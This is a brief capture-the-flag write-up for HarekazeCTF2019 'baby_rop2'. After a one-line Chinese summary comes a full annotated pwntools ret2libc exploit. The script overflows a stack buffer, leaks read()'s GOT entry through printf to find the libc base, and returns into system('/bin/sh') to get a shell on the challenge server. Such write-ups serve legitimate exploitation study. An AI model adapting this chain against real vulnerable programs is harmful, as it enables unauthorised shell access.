[HarekazeCTF2019]baby_rop2

ret2libc

通过 printf 泄露 read 的函数地址，计算 libc 的基址，再构造 ROP 链调用 system('/bin/sh')

from pwn import *

# Two-stage ret2libc exploit script for the HarekazeCTF2019 "baby_rop2" challenge
# (written against the Python 2 pwntools API: str payloads, `.next()` on the
# search generator).
#
# Stage 1: overflow the name buffer, return into a ROP chain that calls
#          printf("%s", &GOT[read]) to leak the runtime address of read(),
#          then return to main for a second input.
# Stage 2: compute the libc base from the leak, then return into
#          system("/bin/sh").
#
# NOTE(review): the hard-coded 0x4006xx/0x4007xx addresses suggest the binary
# is not PIE and has no stack canary (the overflow reaches the return address
# unchecked) — confirm with `checksec`. PIE + a canary would defeat this chain
# as written; the leak itself only needs a readable GOT.

r=remote('node3.buuoj.cn',26686)   # challenge service (practice platform)
elf=ELF('./babyrop2')              # target binary: supplies GOT/PLT addresses
libc=ELF('./libc.so.6')            # libc shipped with the challenge: supplies symbol offsets

# Gadgets in the (non-PIE) binary; names indicate "pop rdi; ret" and
# "pop rsi; pop r15; ret" — verify with ROPgadget/ropper before reuse.
rdi_ret=0x400733
rsi_r15_ret=0x400731
format_str=0x400770  # address of a "%s" string inside the binary, used as printf's format
read_got=elf.got['read']           # GOT slot holding read()'s resolved libc address
printf_plt=elf.plt['printf']       # PLT stub: callable without knowing libc base
main_addr=0x400636                 # re-enter main after the leak to get a second input

# Stage 1 chain. 0x20 bytes of padding presumably fill the buffer and the
# 8 bytes of 'b' overwrite the saved rbp; the next qword is the return address.
payload='a'*0x20+'b'*0x8
payload+=p64(rdi_ret)+p64(format_str)                 # rdi = "%s"
payload+=p64(rsi_r15_ret)+p64(read_got)+p64(0x0)      # rsi = &GOT[read]; r15 = 0 (filler)
payload+=p64(printf_plt)+p64(main_addr)               # printf(rdi, rsi) then back to main

r.recvuntil("What's your name?")
r.sendline(payload)

# printf("%s") prints the raw GOT contents up to the first NUL byte. A
# userland x86-64 libc address is 6 significant bytes ending in 0x7f, so take
# the 6 bytes up to and including 0x7f and zero-pad to 8 before unpacking.
read_addr=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc_base=read_addr-libc.symbols['read']              # leaked address minus read's offset
system_addr=libc_base+libc.symbols['system']
binsh_addr=libc_base+libc.search('/bin/sh').next()    # first "/bin/sh" string in libc

# Stage 2 chain: same padding, rdi = "/bin/sh", call system, return to main.
payload2='a'*0x20+'b'*0x8+p64(rdi_ret)+p64(binsh_addr)+p64(system_addr)+p64(main_addr)
r.recvuntil("What's your name?")
r.sendline(payload2)

r.interactive()   # hand the spawned shell to the user

 
